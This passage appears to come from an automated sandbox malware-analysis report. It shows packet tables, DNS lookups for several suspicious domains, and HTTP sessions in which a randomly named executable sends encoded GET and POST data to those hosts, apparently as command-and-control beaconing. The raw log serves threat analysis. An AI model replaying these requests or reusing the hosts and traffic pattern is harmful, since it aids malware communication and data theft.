                                                  Jan 10, 2025 20:11:48.202092886 CET6452780192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:48.202106953 CET806452763.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:48.202121019 CET806452763.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:48.202138901 CET6452780192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:48.202231884 CET6452780192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:48.213454008 CET806452763.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:48.213479042 CET806452763.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:48.213490963 CET806452763.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:48.213502884 CET806452763.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:48.213516951 CET806452763.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:48.213527918 CET806452763.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:48.213541031 CET806452763.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:48.213555098 CET806452763.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:48.213576078 CET6452780192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:48.213660002 CET6452780192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:48.215425968 CET806452763.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:48.215441942 CET806452763.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:48.215457916 CET806452763.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:48.215467930 CET806452763.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:48.215478897 CET806452763.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:48.215516090 CET6452780192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:48.215548992 CET6452780192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:48.703571081 CET6452780192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:50.302723885 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:50.307727098 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:50.309014082 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:50.325601101 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:50.330461025 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.267721891 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.267761946 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.267777920 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.267796993 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.267832994 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.267862082 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.267879009 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.267884970 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.267895937 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.267911911 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.267925024 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.267929077 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.267947912 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.267956972 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.268018007 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.273885965 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.274080992 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.274097919 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.274203062 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.479931116 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.479958057 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.480024099 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.498325109 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.498339891 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.498353004 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.498363972 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.498377085 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.498403072 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.498436928 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.498703957 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.498770952 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.504873991 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.504898071 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.504909992 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.504945993 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.517395020 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.517405987 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.517417908 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.517443895 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.517452002 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.517478943 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.533860922 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.533875942 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.533889055 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.533921003 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.533958912 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.549220085 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.549233913 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.549245119 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.549338102 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.562302113 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.562340021 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.562351942 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.562371016 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.562391043 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.564650059 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.564671993 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.564770937 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.564800978 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.564812899 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.564851046 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.574672937 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.574686050 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.574700117 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.574729919 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.574743032 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.574784040 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.711133957 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.711175919 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.711188078 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.711203098 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.711216927 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.711245060 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.711282015 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.711589098 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.711601973 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.711615086 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.711627007 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.711638927 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.711647034 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.711653948 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.711684942 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.712392092 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.712434053 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.712450027 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.712492943 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.719260931 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.719274044 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.719307899 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.719336987 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.719361067 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.719378948 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.723278046 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.723289967 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.723334074 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.723556995 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.723603010 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.723613977 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.733324051 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.733336926 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.733361006 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.733392954 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.733407974 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.733414888 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.753453016 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.753465891 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.753529072 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.753542900 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.753555059 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.753592014 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.771944046 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.771974087 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.771990061 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.772001982 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.772013903 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.772031069 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.796559095 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.796571970 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.796616077 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.796617985 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.796626091 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.796660900 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.805020094 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.805036068 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.805047989 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.805077076 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.805109978 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.814078093 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.814107895 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.814194918 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.814235926 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.814248085 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.814275026 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.824542999 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.824554920 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.824589968 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.824600935 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.824630976 CET806452863.250.43.134192.168.2.9
                                                  Jan 10, 2025 20:11:51.824675083 CET6452880192.168.2.963.250.43.134
                                                  Jan 10, 2025 20:11:51.828649998 CET6452880192.168.2.963.250.43.134

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 10, 2025 20:10:15.522737980 CET5355235162.159.36.2192.168.2.9
                                                  Jan 10, 2025 20:10:16.095263958 CET4917053192.168.2.91.1.1.1
                                                  Jan 10, 2025 20:10:16.114404917 CET53491701.1.1.1192.168.2.9
                                                  Jan 10, 2025 20:10:50.011476994 CET5964553192.168.2.91.1.1.1
                                                  Jan 10, 2025 20:10:50.503803968 CET53596451.1.1.1192.168.2.9
                                                  Jan 10, 2025 20:11:06.472484112 CET5968553192.168.2.91.1.1.1
                                                  Jan 10, 2025 20:11:06.486460924 CET53596851.1.1.1192.168.2.9
                                                  Jan 10, 2025 20:11:19.988236904 CET6213653192.168.2.91.1.1.1
                                                  Jan 10, 2025 20:11:20.005752087 CET53621361.1.1.1192.168.2.9
                                                  Jan 10, 2025 20:11:33.363230944 CET6490453192.168.2.91.1.1.1
                                                  Jan 10, 2025 20:11:33.382097006 CET53649041.1.1.1192.168.2.9
                                                  Jan 10, 2025 20:11:47.131067991 CET6235153192.168.2.91.1.1.1
                                                  Jan 10, 2025 20:11:47.148787975 CET53623511.1.1.1192.168.2.9

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Jan 10, 2025 20:10:16.095263958 CET192.168.2.91.1.1.10x4f17Standard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                  Jan 10, 2025 20:10:50.011476994 CET192.168.2.91.1.1.10x79aStandard query (0)www.qqa79.topA (IP address)IN (0x0001)false
                                                  Jan 10, 2025 20:11:06.472484112 CET192.168.2.91.1.1.10xc10bStandard query (0)www.1secondlending.oneA (IP address)IN (0x0001)false
                                                  Jan 10, 2025 20:11:19.988236904 CET192.168.2.91.1.1.10xc4c9Standard query (0)www.supernutra01.onlineA (IP address)IN (0x0001)false
                                                  Jan 10, 2025 20:11:33.363230944 CET192.168.2.91.1.1.10x24efStandard query (0)www.wine-drinkers.clubA (IP address)IN (0x0001)false
                                                  Jan 10, 2025 20:11:47.131067991 CET192.168.2.91.1.1.10xb585Standard query (0)www.oneeyetrousersnake.xyzA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Jan 10, 2025 20:10:16.114404917 CET1.1.1.1192.168.2.90x4f17Name error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                  Jan 10, 2025 20:10:50.503803968 CET1.1.1.1192.168.2.90x79aNo error (0)www.qqa79.topqqa79.topCNAME (Canonical name)IN (0x0001)false
                                                  Jan 10, 2025 20:10:50.503803968 CET1.1.1.1192.168.2.90x79aNo error (0)qqa79.top38.47.233.21A (IP address)IN (0x0001)false
                                                  Jan 10, 2025 20:11:06.486460924 CET1.1.1.1192.168.2.90xc10bNo error (0)www.1secondlending.one43.205.198.29A (IP address)IN (0x0001)false
                                                  Jan 10, 2025 20:11:20.005752087 CET1.1.1.1192.168.2.90xc4c9No error (0)www.supernutra01.online188.114.97.3A (IP address)IN (0x0001)false
                                                  Jan 10, 2025 20:11:20.005752087 CET1.1.1.1192.168.2.90xc4c9No error (0)www.supernutra01.online188.114.96.3A (IP address)IN (0x0001)false
                                                  Jan 10, 2025 20:11:33.382097006 CET1.1.1.1192.168.2.90x24efNo error (0)www.wine-drinkers.club194.245.148.189A (IP address)IN (0x0001)false
                                                  Jan 10, 2025 20:11:47.148787975 CET1.1.1.1192.168.2.90xb585No error (0)www.oneeyetrousersnake.xyzoneeyetrousersnake.xyzCNAME (Canonical name)IN (0x0001)false
                                                  Jan 10, 2025 20:11:47.148787975 CET1.1.1.1192.168.2.90xb585No error (0)oneeyetrousersnake.xyz63.250.43.134A (IP address)IN (0x0001)false
                                                  Jan 10, 2025 20:11:47.148787975 CET1.1.1.1192.168.2.90xb585No error (0)oneeyetrousersnake.xyz63.250.43.135A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • www.qqa79.top
                                                  • www.1secondlending.one
                                                  • www.supernutra01.online
                                                  • www.wine-drinkers.club
                                                  • www.oneeyetrousersnake.xyz

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.96451438.47.233.21806568C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jan 10, 2025 20:10:50.526536942 CET436OUTGET /mz0w/?rdmhfXe=uMzU0JGK22aEYJLCyAIreKcU1rJUCkGv0SPCs66KRtTFzrJJ373CiBnwq6iLrm6CBfWGplZZf3wVkFmev9wwp4pfrJHMjCh6luBqHWNFeR0cmEvsKw==&AF=At8pGDY0Z HTTP/1.1
                                                  Host: www.qqa79.top
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Jan 10, 2025 20:10:51.433765888 CET691INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Fri, 10 Jan 2025 19:10:51 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 548
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.96451543.205.198.29806568C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jan 10, 2025 20:11:06.509505987 CET721OUTPOST /6pwo/ HTTP/1.1
                                                  Host: www.1secondlending.one
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Accept-Encoding: gzip, deflate, br
                                                  Content-Length: 196
                                                  Cache-Control: max-age=0
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.1secondlending.one
                                                  Referer: http://www.1secondlending.one/6pwo/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Data Raw: 72 64 6d 68 66 58 65 3d 44 65 77 72 42 73 32 6d 54 39 6c 6d 71 53 30 68 38 78 6f 2f 46 68 77 57 47 42 70 4b 5a 57 54 4e 50 78 35 6e 73 32 31 56 41 55 6b 6f 62 58 71 71 64 5a 45 48 53 51 4e 7a 6c 79 46 4d 68 37 69 6b 39 2f 4f 64 72 48 41 61 4d 6b 41 70 41 52 62 65 75 55 6e 4f 6a 32 6f 30 62 45 72 51 73 41 4d 41 75 39 32 55 4a 41 6b 6d 76 37 63 4a 50 38 4c 6a 75 6a 79 62 56 76 61 63 51 75 6c 79 67 38 63 30 36 70 59 6f 41 75 33 37 65 6e 6a 69 67 6f 50 45 5a 38 63 68 6c 49 65 57 43 4d 6b 65 55 53 58 79 74 58 62 6a 43 72 4c 38 6c 56 70 73 6e 47 52 36 52 67 69 30 6e 48 30 46 78 35 78 51
                                                  Data Ascii: rdmhfXe=DewrBs2mT9lmqS0h8xo/FhwWGBpKZWTNPx5ns21VAUkobXqqdZEHSQNzlyFMh7ik9/OdrHAaMkApARbeuUnOj2o0bErQsAMAu92UJAkmv7cJP8LjujybVvacQulyg8c06pYoAu37enjigoPEZ8chlIeWCMkeUSXytXbjCrL8lVpsnGR6Rgi0nH0Fx5xQ
                                                  Jan 10, 2025 20:11:07.355613947 CET691INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Fri, 10 Jan 2025 19:11:07 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 548
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.96451643.205.198.29806568C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jan 10, 2025 20:11:09.054383039 CET745OUTPOST /6pwo/ HTTP/1.1
                                                  Host: www.1secondlending.one
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Accept-Encoding: gzip, deflate, br
                                                  Content-Length: 220
                                                  Cache-Control: max-age=0
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.1secondlending.one
                                                  Referer: http://www.1secondlending.one/6pwo/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Data Raw: 72 64 6d 68 66 58 65 3d 44 65 77 72 42 73 32 6d 54 39 6c 6d 70 78 38 68 35 53 77 2f 4e 68 77 56 4e 68 70 4b 51 32 54 4a 50 78 31 6e 73 33 67 4f 41 69 55 6f 62 31 79 71 61 63 77 48 52 51 4e 7a 78 69 46 56 76 62 69 76 39 2f 53 2f 72 47 4d 61 4d 67 6f 70 41 52 4c 65 75 6a 7a 50 69 6d 6f 4d 57 6b 72 53 7a 77 4d 41 75 39 32 55 4a 41 67 49 76 37 45 4a 4d 50 54 6a 76 47 47 59 57 76 61 66 47 2b 6c 79 6b 38 63 34 36 70 5a 48 41 71 33 42 65 6c 62 69 67 74 72 45 5a 76 45 69 73 49 66 38 47 4d 6c 58 46 51 43 56 72 67 58 6c 49 61 71 59 6b 47 38 51 67 6e 74 6b 41 53 72 76 79 51 30 69 32 65 34 34 6c 39 56 4d 4c 4a 62 77 4f 50 4a 45 63 46 30 59 63 46 38 65 52 77 3d 3d
                                                  Data Ascii: rdmhfXe=DewrBs2mT9lmpx8h5Sw/NhwVNhpKQ2TJPx1ns3gOAiUob1yqacwHRQNzxiFVvbiv9/S/rGMaMgopARLeujzPimoMWkrSzwMAu92UJAgIv7EJMPTjvGGYWvafG+lyk8c46pZHAq3BelbigtrEZvEisIf8GMlXFQCVrgXlIaqYkG8QgntkASrvyQ0i2e44l9VMLJbwOPJEcF0YcF8eRw==
                                                  Jan 10, 2025 20:11:09.893371105 CET691INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Fri, 10 Jan 2025 19:11:09 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 548
                                                  Connection: close
